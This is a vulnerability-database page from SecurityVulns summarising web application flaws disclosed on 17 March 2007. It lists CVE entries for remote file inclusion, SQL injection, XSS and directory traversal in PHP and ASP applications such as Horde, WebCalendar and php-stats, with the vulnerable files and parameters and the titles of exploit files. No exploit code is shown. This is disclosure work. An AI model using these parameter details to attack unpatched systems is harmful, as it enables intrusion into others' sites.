Computer Security
[EN] securityvulns.ru no-pyccku


Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:17.03.2007
Source:
SecurityVulns ID:7414
Type:remote
Threat Level:
5/10
Description:PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
Affected:WEBCALENDAR : WebCalendar 0.9
 HORDE : IMP 3.1
 HORDE : IMP 3.2
 HORDE : Horde 3.0
 WOLTLAB : Woltlab Burning Board 2.3
 WEBAPP : WebAPP 0.9
 PHPSTATS : php-stats 0.1
 HORDE : Horde 3.1
 VBULLETIN : vBulletin 3.6
 HORDE : IMP 3.0
 HORDE : IMP 2.3
 OSCOMMERCE : PHP Point Of Sale 1.1
 ROT13 : Rot 13
 CLBOX : CLBOX 1.01
 MPMCHAT : MPM Chat 2.5
 PHPDBDESIGNED : PHP DB Designer 1.02
 CREATIVEHEADS : Creative Files 1.2
 MCGALLERY : McGallery 0.5
 CREATIVEHEADS : Creative Guestbook 1.0
 DEYFOXDESIGNS : Dayfox Blog 4
 CARBONIZE : Lazarus Guestbook 1.7
 WOLTLAB : Burning Board Lite 1.0
 GROUPIT : Groupit 2.0
 BPBLOG : BP Blog 7.0
CVE:CVE-2007-1631 (** DISPUTED ** PHP remote file inclusion vulnerability in signup.php in CLBOX 1.01 allows remote attackers to execute arbitrary PHP code via a URL in the header parameter. NOTE: this issue has been disputed by a reliable third party, stating that header is defined through an include file before use.)
 CVE-2007-1620 (Multiple PHP remote file inclusion vulnerabilities in PHP DB Designer 1.02 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) _SESSION[SITE_PATH] parameter to (a) wind/help.php or (b) wind/about.php, or the (2) _SESSION[DRIVER] parameter to (c) db/session.php.)
 CVE-2007-1613 (Directory traversal vulnerability in view.php in MPM Chat 2.5 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the logi parameter.)
 CVE-2007-1556 (SQL injection vulnerability in kommentare.php in Creative Files 1.2 allows remote attackers to execute arbitrary SQL commands via the dlid parameter.)
 CVE-2007-1525 (Direct static code injection vulnerability in postpost.php in Dayfox Blog (dfblog) 4 allows remote attackers to execute arbitrary PHP code via the cat parameter, which can be executed via a request to posts.php.)
 CVE-2007-1518 (SQL injection vulnerability in usergroups.php in Woltlab Burning Board (wBB) 2.x allows remote attackers to execute arbitrary SQL commands via the array index of the applicationids array.)
 CVE-2007-1515 (Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP H3 4.1.3, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via (1) the email Subject header in thread.php, (2) the edit_query parameter in search.php, or other unspecified parameters in search.php. NOTE: some of these details are obtained from third party information.)
 CVE-2007-1514 (PHP remote file inclusion vulnerability in index.php in ViperWeb Portal alpha 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the modpath parameter.)
 CVE-2007-1513 (PHP remote file inclusion vulnerability in comanda.php in GraFX Company WebSite Builder (CWB) PRO 1.9.8, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter.)
 CVE-2007-1510 (SQL injection vulnerability in post.php in Particle Blogger 1.0.0 through 1.2.0 allows remote attackers to execute arbitrary SQL commands via the postid parameter.)
 CVE-2007-1509 (Directory traversal vulnerability in enkrypt.php in Sascha Schroeder krypt (aka Holtstraeter Rot 13) allows remote attackers to read arbitrary files via a .. (dot dot) in the datei parameter.)
 CVE-2007-1508 (Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.)
 CVE-2007-1489 (Unspecified vulnerability in web-app.org Web Automated Perl Portal (WebAPP) 0.9.9.4 to 0.9.9.6 allows remote attackers to obtain admin access by modifying cookies and performing "certain consecutive actions," possibly due to a cross-site request forgery (CSRF) vulnerability.)
 CVE-2007-1487 (Directory traversal vulnerability in index.php in Sascha Schroeder (aka CyberTeddy or Cyber-inside) WebLog allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a showarticles action.)
 CVE-2007-1486 (PHP remote file inclusion vulnerability in template.class.php in Carbonize Lazarus Guestbook before 1.7.3 allows remote attackers to execute arbitrary PHP code via a URL in the include_path parameter to admin.php, probably due to a dynamic variable evaluation vulnerability.)
 CVE-2007-1483 (Multiple PHP remote file inclusion vulnerabilities in WebCalendar 0.9.45 allow remote attackers to execute arbitrary PHP code via a URL in the includedir parameter to (1) login.php, (2) get_reminders.php, or (3) get_events.php.)
 CVE-2007-1482 (Cross-site scripting (XSS) vulnerability in index.php in WBBlog allows remote attackers to inject arbitrary web script or HTML via the e_id parameter in a viewentry cmd.)
 CVE-2007-1481 (SQL injection vulnerability in index.php in WBBlog allows remote attackers to execute arbitrary SQL commands via the e_id parameter in a viewentry cmd.)
 CVE-2007-1480 (Creative Guestbook 1.0 allows remote attackers to add an administrative account via a direct request to createadmin.php with Name, Email, and PASSWORD parameters set.)
 CVE-2007-1479 (Cross-site scripting (XSS) vulnerability in Guestbook.php in Creative Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.)
 CVE-2007-1478 (download.php in McGallery 0.5b allows remote attackers to read arbitrary files and obtain script source code via the filename parameter.)
 CVE-2007-1477 (** DISPUTED ** Directory traversal vulnerability in index.php in PHP Point Of Sale for osCommerce 1.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the cfg_language parameter. NOTE: this issue has been disputed by CVE, since the cfg_language variable is configured upon proper product installation.)
 CVE-2007-1474 (Argument injection vulnerability in the cleanup cron script in Horde Project Horde and IMP before Horde Application Framework 3.1.4 allows local users to delete arbitrary files and possibly gain privileges via multiple space-delimited pathnames.)
 CVE-2007-1472 (Variable overwrite vulnerability in groupit/base/groupit.start.inc in Groupit 2.00b5 allows remote attackers to conduct remote file inclusion attacks and execute arbitrary PHP code via arguments that are written to $_GLOBALS, as demonstrated using a URL in the c_basepath parameter to (1) content.php, (2) userprofile.php, (3) password.php, (4) dispatch.php, and (5) deliver.php in html/, and possibly (6) load.inc.php and related files.)
 CVE-2007-1462 (The luci server component in conga preserves the password between page loads for the Add System/Cluster task flow by storing the password in the Value attribute of a password entry field, which allows attackers to steal the password by performing a "view source" or other operation to obtain the web page. NOTE: there are limited circumstances under which such an attack is feasible.)
 CVE-2007-1455 (Multiple absolute path traversal vulnerabilities in Fantastico, as used with cPanel 10.x, allow remote authenticated users to include and execute arbitrary local files via (1) the userlanguage parameter to includes/load_language.php or (2) the fantasticopath parameter to includes/mysqlconfig.php and certain other files.)
 CVE-2007-1445 (SQL injection vulnerability in the heme preview feature for default.asp in BP Blog 7.0 through 7.0.2 allows remote attackers to execute arbitrary SQL commands via the layout parameter.)
 CVE-2007-1443 (Multiple cross-site scripting (XSS) vulnerabilities in register.php in Woltlab Burning Board (wBB) 2.3.6 and Burning Board Lite 1.0.2pl3e allow remote attackers to inject arbitrary web script or HTML via the (1) r_username, (2) r_email, (3) r_password, (4) r_confirmpassword, (5) r_homepage, (6) r_icq, (7) r_aim, (8) r_yim, (9) r_msn, (10) r_year, (11) r_month, (12) r_day, (13) r_gender, (14) r_signature, (15) r_usertext, (16) r_invisible, (17) r_usecookies, (18) r_admincanemail, (19) r_emailnotify, (20) r_notificationperpm, (21) r_receivepm, (22) r_emailonpm, (23) r_pmpopup, (24) r_showsignatures, (25) r_showavatars, (26) r_showimages, (27) r_daysprune, (28) r_umaxposts, (29) r_dateformat, (30) r_timeformat, (31) r_startweek, (32) r_timezoneoffset, (33) r_usewysiwyg, (34) r_styleid, (35) r_langid, (36) key_string, (37) key_number, (38) disablesmilies, (39) disablebbcode, (40) disableimages, (41) field[1], (42) field[2], and (43) field[3] parameters. NOTE: a third-party researcher has disputed some of these )
 CVE-2006-7173 (Direct static code injection vulnerability in admin.php in PHP-Stats 0.1.9.1b and earlier allows remote attackers to execute arbitrary PHP code via a crafted option_new[report_w_day] parameter in a preferenze action, which can be later accessed via option/php-stats-options.php.)
 CVE-2006-7172 (Multiple SQL injection vulnerabilities in php-stats.recphp.php in PHP-Stats 0.1.9.1b and earlier allow remote attackers to execute arbitrary code via a leading dotted-quad IP address string in the (1) PC-REMOTE-ADDR HTTP header, which is inserted into $_SERVER['HTTP_PC_REMOTE_ADDR'], or (2) ip parameter.)
Original documentdocumentDj7xpl, WebLog (index.php file) Remote File Disclosure Vulnerability (17.03.2007)
 documentDj7xpl, Creative Guestbook 1.0 Multiple Remote Vulnerabilities (17.03.2007)
 documentpiker.ther00t_(at)_gmail.com, McGallery 0.5b Arbitrary File Download Vulnerability (17.03.2007)
 documentXORON, WBBlog (XSS/SQL) Multiple Remote Vulnerabilities (17.03.2007)
 documentXORON, Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerabilities (17.03.2007)
 documentGolD_M, PHP DB Designer <= 1.02 Remote File Include Exploit (17.03.2007)
 documentGolD_M, MPM Chat 2.5 (view.php logi) Local File Include Exploit (17.03.2007)
 documentBorN To K!LL BorN To K!LL, CLBOX <= (signup.php header) Remote File Include Vulnerability (17.03.2007)
 documentSea Shark, Oracle Portal PORTAL.wwv_main.render_warning_screen XSS (17.03.2007)
 documentBorN To K!LL BorN To K!LL, Rot 13 <= (enkrypt.php) Remote File Disclosure Vulnerability (17.03.2007)
 documentdisfigure, vbulletin admincp sql injection (17.03.2007)
 documentBorN To K!LL BorN To K!LL, PHP Point Of Sale for osCommerce <= (index.php) Remote File Include Vuln (17.03.2007)
 documentIDEFENSE, iDefense Security Advisory 03.15.07: Horde Project Cleanup Script Arbitrary File Deletion Vulnerability (17.03.2007)
 documentasamad_(at)_arpatech.com, Remote File Inclusion in ViperWeb (17.03.2007)
 documenterdc_(at)_echo.or.id, [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability (17.03.2007)
 documenterdc_(at)_echo.or.id, [ECHO_ADV_76$2007] Company WebSite Builder PRO (INCLUDE_PATH) Remote File Inclusion Vulnerability (17.03.2007)
 documentMandr4ke.root_(at)_gmail.com, DirectAdmin Cross Site Scripting XSS (17.03.2007)
Files:Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit
 Php-Stats <= 0.1.9.1b admin 2 exec() exploit
 Php-Stats <= 0.1.9.1b "ip" urldecode()/ ereg() / sql injection / cleat text admin pass disclosure exploit (method ii)
 Php-Stats <= 0.1.9.1b PC-REMOTE-ADDR sql injection / cleat text admin pass
 Exploits Dayfox Blog 4 remote code execution

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod